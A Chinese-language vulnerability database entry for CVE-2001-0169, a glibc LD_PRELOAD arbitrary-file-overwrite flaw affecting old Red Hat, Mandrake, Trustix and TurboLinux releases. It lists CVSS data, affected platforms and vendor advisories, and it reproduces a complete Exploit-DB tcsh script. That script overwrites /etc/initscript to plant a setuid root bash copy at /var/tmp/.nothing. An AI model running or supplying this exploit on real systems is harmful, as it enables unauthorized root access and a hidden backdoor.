CVE-2001-0169
CVSS2.1
发布时间 :2001-03-26 00:00:00
修订时间 :2008-09-05 16:23:26
NMCOE    

[原文]When using the LD_PRELOAD environmental variable in SUID or SGID applications, glibc does not verify that preloaded libraries in /etc/ld.so.cache are also SUID/SGID, which could allow a local user to overwrite arbitrary files by loading a library from /lib or /usr/lib.


[CNNVD]Glibc SUID/SGID LD_PRELOAD文件覆盖漏洞(CNNVD-200103-083)

        Glibc在使用SUID或SGID程序的LD_PRELOAD环境变量时,不确认/etc/ld.so.cache和SUID/SGID的预装载库,本地用户可以利用该漏洞通过从/lib或/usr/lib加载库覆盖任意文件。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:mandrakesoft:mandrake_linux:6.1MandrakeSoft Mandrake Linux 6.1
cpe:/o:trustix:secure_linux:1.2Trustix Secure Linux 1.2
cpe:/o:redhat:linux:6.2::alpha
cpe:/o:redhat:linux:6.2::sparc
cpe:/o:redhat:linux:6.0::i386
cpe:/o:redhat:linux:6.1::i386
cpe:/o:redhat:linux:6.1::alpha
cpe:/o:trustix:secure_linux:1.1Trustix Secure Linux 1.1
cpe:/o:mandrakesoft:mandrake_linux:7.2MandrakeSoft Mandrake Linux 7.2
cpe:/o:mandrakesoft:mandrake_linux:7.1MandrakeSoft Mandrake Linux 7.1
cpe:/o:turbolinux:turbolinux:6.0.5
cpe:/o:mandrakesoft:mandrake_linux:7.0MandrakeSoft Mandrake Linux 7.0
cpe:/o:redhat:linux:6.1::sparc
cpe:/o:redhat:linux:6.0::alpha
cpe:/o:redhat:linux:6.0::sparc
cpe:/o:redhat:linux:6.2::i386
cpe:/o:turbolinux:turbolinux:6.1
cpe:/o:mandrakesoft:mandrake_linux_corporate_server:1.0.1MandrakeSoft Mandrake Linux Corporate Server 1.0.1
cpe:/o:mandrakesoft:mandrake_linux:6.0MandrakeSoft Mandrake Linux 6.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0169
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0169
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-083
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2223
(VENDOR_ADVISORY)  BID  2223
http://www.securityfocus.com/archive/1/157650
(PATCH)  BUGTRAQ  20010121 Trustix Security Advisory - glibc
http://www.redhat.com/support/errata/RHSA-2001-002.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2001:002
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-012.php3?dis=7.2
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2001:012
http://xforce.iss.net/static/5971.php
(VENDOR_ADVISORY)  XF  linux-glibc-preload-overwrite
http://www.novell.com/linux/security/advisories/2001_001_glibc_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:01
http://www.debian.org/security/2001/dsa-039
(UNKNOWN)  DEBIAN  DSA-039
http://www.calderasystems.com/support/security/advisories/CSSA-2001-007.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-007
http://archives.neohapsis.com/archives/linux/turbolinux/2001-q1/0004.html
(UNKNOWN)  TURBO  TLSA2000021-2

- 漏洞信息

Glibc SUID/SGID LD_PRELOAD文件覆盖漏洞
低危 未知
2001-03-26 00:00:00 2005-05-02 00:00:00
本地  
        Glibc在使用SUID或SGID程序的LD_PRELOAD环境变量时,不确认/etc/ld.so.cache和SUID/SGID的预装载库,本地用户可以利用该漏洞通过从/lib或/usr/lib加载库覆盖任意文件。

- 公告与补丁

        

- 漏洞信息 (290)

GLIBC 2.1.3 ld_preload Local Exploit (EDBID:290)
linux local
2001-03-04 Verified
0 shadow
N/A [点击下载]
#!/bin/tcsh
# przyklad wykorzystania dziury w LD_PRELOAD
# shadow (tested on redhat 6.0, should work on others)

if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje
cd /lib
umask 0
setenv LD_PRELOAD libSegFault.so
setenv SEGFAULT_OUTPUT_NAME /etc/initscript
echo czekaj... to moze chwile potrwac...
while (! -e /etc/initscript )
  ( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null
end

echo utworzylem plik initscript

cat > /etc/initscript << _init_
cp /bin/bash /var/tmp/.nothing
chmod 6755 /var/tmp/.nothing
rm /etc/initscript
_init_

echo i nawet go podmienilem

# milw0rm.com [2001-03-04]
		

- 漏洞信息

1731
GNU C Library (glibc) LD_PRELOAD Arbitrary File Overwrite
Local Access Required
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2001-01-21 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站